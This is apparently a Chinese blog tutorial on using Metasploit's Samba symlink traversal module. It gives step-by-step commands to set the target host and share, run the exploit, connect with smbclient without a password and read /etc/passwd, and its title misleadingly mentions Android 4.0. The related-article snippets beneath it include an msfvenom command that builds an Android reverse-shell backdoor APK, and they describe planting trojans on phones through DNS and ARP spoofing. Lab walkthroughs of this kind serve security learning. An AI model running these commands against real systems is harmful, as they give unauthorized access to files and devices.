android4.0漏洞msf,Metasploit溢出samba提权漏洞

最新推荐文章于 2024-05-13 11:19:20 发布
最新推荐文章于 2024-05-13 11:19:20 发布
阅读量481 收藏 2
点赞数
文章标签: android4.0漏洞msf

Samba是一套实现SMB(server messages block)协议,跨平台进行文件共享和打印共享服务的程序,samba的sambd默认配置在可写文件共享时,存在目录遍历漏洞,远程用户可以通过smbclient端使用一个对称命,创建一个包含..的目录遍历符的软连接 ,可以进行目录遍历以及访问任意文件。

一、利用nmap工具扫描目标主机

1.1使用nmap命令对目标主机进行扫描。单击桌面空白处,右键菜单选择“在终端中打开”。

e2644b587aaa144baabd81d0116a7b1f.png

1.3在终端中输入命令“msfconsole”,启动MSF终端。

1.4在终端中输入命令“search samba”,搜索samba的相关工具和***载荷。

1.5在终端中输入命令“use auxiliary/admin/smb/samba_symlink_traversal”,启用漏洞利用模块, 提示符就会提示进入到该路径下。

497ae7fda01c6a8b0bff027dfa5f9964.png

1.6在终端中输入命令“info”,查看需要设置的相关项,“yes”表示必须填写的参数。

dd211f09fdcec7f548e7be12eda8922b.png

1.7在终端中输入命令“set RHOST 192.168.1.3”,设置目标主机的IP地址。

1.8在终端中输入“set SMBSHARE tmp”, 设置SAM可写文件。

1.9在终端中输入“exploit”, 开始***。

1.10新打开一个终端,输入“smbclient //192.168.1.3/tmp”,直接回车,不用输入密码。

f7325cdd8123d0186af38b42876d8f39.png

1.11在终端中输入“cd rootfs”, 进入rootfs目录,在终端下输入命令“ls”,列出目录。

1.12在终端中输入“more /etc/passwd”, 查看目标主机系统中的密码。

99e3c820286032e84e8c92d4d8f84cd1.png

db3e3f84cfe36d24d9d91e0203dc5f9c.png

西西喵
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
MSF扫描漏洞模块
qq_41821067的博客
02-18 5484
目录DNS记录解析查询工具nslookupMSF 扫描模块nmap自动化扫描插件漏洞库小工具 参考博客 我们可以利用网站进行whois查询 https://www.benmi.com/whoishistory/ 可以通过 https://www.reg007.com/ 查看手机号查询过什么网站 DNS记录解析查询工具nslookup 如下两种查询方式 查询类型默认是NS名字服务器记录 MSF 扫描模块nmap 可以看到通过nmap可以看到端口开放信息 -sV 是查询开放端口 -V是省略 自动化扫描
Metasploit溢出samba提权漏洞
weixin_33862041的博客
12-09 710
Samba是一套实现SMB(server messages block)协议,跨平台进行文件共享和打印共享服务的程序,samba的sambd默认配置在可写文件共享时,存在目录遍历漏洞,远程用户可以通过smbclient端使用一个对称命,创建一个包含..的目录遍历符的软连接 ,可以进行目录遍历以及访问任意文件。一、利用nmap工具扫描目标主机1.1使用nmap命令对目...
MSF入侵安卓手机【附源码笔记】
最新发布
2301_77162959的博客
05-13 497
MSFMetasploit的简称,Metasploit是一款开源的安全漏洞检测工具,非常强大,分别有Windows版和Linux版,工具里集成了许多微软公布的漏洞(0day)。现在要做的就是把木马文件搞到人家的手机上,思路有很多 可以DNS arp劫持欺骗 只要对方用手机下载文件 就会下载我们的木马文件。msfpayload无法找到命令 所以使用msfvenom即可,这里LHOST 对应的是本机的IP地址 LPORT对应你要监听的端口 然后生成木马的路径。
metasploit---后漏洞利用-提权
孤的博客
11-17 1763
提权就是提升对资源的访问权限,正常情况下,这些资源是否保护的,拒绝普通或为授权用户访问。通过提升权限,恶意用户可以执行为授权的行为,可以对计算机或者整个网络造成危害。 提权广义上分为两种形式 垂直提权:在这种权限提升方式中,低权限的用户或应用程序能够访问那些只针对授权用户或管理员用户才能使用的功能。这种特征也称作权限升级。 水平提权:这种提权通常指的是用户权限在水平方向的扩展,也就是,普通用户能访...
samba 3.x提权漏洞
→_→
08-17 1264
声明:以下内容均来自“实验吧”免费公益渗透平台,该平台至今仍旧在维护,估计~~,为此把以前保留的笔记拿来分享下。 [实验目的] 1) 利用Samba漏洞,获得目标主机root权限 [实验原理] 1) Samba中负责在SAM数据库更新用户口令的代码未经过滤便将用户输入传输给了/bin/sh.如果再调用smb.conf中定义的外部脚本时,通过对/bin/sh的MS-RPC调用提交了而已输入的话,就可能允许攻击者以nobody用户的权限执行任意命令.Samba服务端口:139\445. ...
Metasploit溢出漏洞
hhiollk的博客
07-07 731
废话不多说直接上图帖命令
利用Metasploit进行Linux提权
01-09
Metasploit 拥有msfpayload 和msfencode 这两个工具,这两个工具不但可以生成exe 型后门,一可以生成网页脚本类型的webshell ,通过生成webshell 然后设置监听器,访问webshell的url,幸运的话可以产生一个session,...
linux版Metasploit
04-06
linux版Metasploit,支持各个linux发行版本,一键安装,一键日穿内网
MySQL数据库渗透及漏洞利用总结
02-25
各种Mysql注入,Mysql提权,Mysql数据库root账号webshell获取等的,但没有一个对Mysql数据库渗透较为全面对总结,针对这种情况我们开展了研究,虽然我们团队今年正在出版《网络攻防实战研究——漏洞利用提权》,但...
CVE-2015-0240: Samba 漏洞提权风险
weixin_33850015的博客
06-06 324
Samba的守护进程smbd里有一个为初始化的指针可被远程漏洞利用,这个编号CVE-2015-0240的漏洞允许一个恶意的Samba客户端发送一个特定的netlogon数据包给smbd获得smbd运行的权限,而smbd的默认权限是root,这个漏洞影响了Samba 3.5和更新的版本,主流的GNU/Linux发行版都受到了影响,目前Debian已经修复。...
android msf 漏洞,MSF之ms各种漏洞
weixin_34812649的博客
05-31 847
ms开头是代表微软的漏洞,如ms08-067 那么08是代表2008年微软出的漏洞,067是代表08年第67个漏洞5.1应用软件格式渗透,利用word去渗透(MS10-087)用到的靶机为:WinXPenSP3。打开msfconsole搜索下ms10-018的路径:search ms10-087。使用这个模块:Use exploit/windows/fileformat/ms10_087_rtf...
Kali利用MSF渗透安卓手机
weixin_51641247的博客
03-29 5144
利用Kali渗透安卓手机; MSF是一个综合性渗透测试工具,集成信息收集、漏洞扫描、漏洞利用以及提权等功能的工具
MSF - Android
ShenMian000
10-05 793
更新中 Step 1 生成后门 msfvenom -p android/meterpreter/reverse_tcp LHOST=<本地IP> LPORT=<监听Port> R -o backdoor.apk 当目标执行后门时,MSF会向后门发送Payload。当Payload载入后即可开始控制目标。 Step 2 开启监听任务 msf > use use exp...
android4.4 superuser,Android Superuser 提权漏洞分析
weixin_29083373的博客
05-28 455
近日,国外安全研究人员揭露多款Android平台下的授权应用管理软件存在3个安全漏洞,利用漏洞可进行root提权,详见链接:http://forum.xda-developers.com/showthread.php?t=2525552。TSRC也对这3个Android Superuser提权漏洞进行了分析,具体分析情况请参见下文。一、Superuser环境变量设置漏洞【影响产品】在Andr...
利用MSF攻击Android
qq_45746768的博客
07-08 3757
利用Metasploit攻击Android
MSF入侵安卓手机
2301_77162959的博客
07-11 1193
里边安装了许许多多的工具。其中MSF就自带有。MSFMetasploit的简称,Metasploit是一款开源的安全漏洞检测工具,非常强大,分别有Windows版和Linux版,工具里集成了许多微软公布的漏洞(0day)。现在要做的就是把木马文件搞到人家的手机上,思路有很多 可以DNS arp劫持欺骗 只要对方用手机下载文件 就会下载我们的木马文件。这样我们就在/root/路径下生成了一个APK的安卓木马文件,至于木马的免杀暂且不谈。还有社工什么等等的,这里我就简单的把木马文件弄我自己的手机上做测试。
Metasploit 权限提升(炊少教学)
weiliang369的博客
02-26 570
前言   现在的入侵是越来越难了,人们的安全意识都普遍提高了不少,连个人用户都懂得防火墙,杀毒软件要装备在手,对于微软的补丁升级也不再是不加问津。因此现在我们想在因特网上扫描弱口令的主机已经几乎是痴心妄想了。(这可是一件大大的好事啊。)   但是这也使得我们作黑客的进行入侵检测达到了一个前所未有的难度。通过各种手段,我们通常并不能直接获得一个系统的管理员权限。比如我们通过某些对IIS的攻击,只能获得IUSR-MACHINENAME的权限(如上传asp木马,以及某些溢出等)。这个帐号通常可是系统默认的gu
msf上传文件到服务器,Metasploit 文件包含漏洞
05-25
Metasploit Framework (MSF) 是一款流行的渗透测试工具,它可以用于执行各种类型的渗透测试任务。其中一个功能是利用文件包含漏洞来上传文件到目标服务器。 在 Metasploit 中,可以使用“exploit/multi/...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值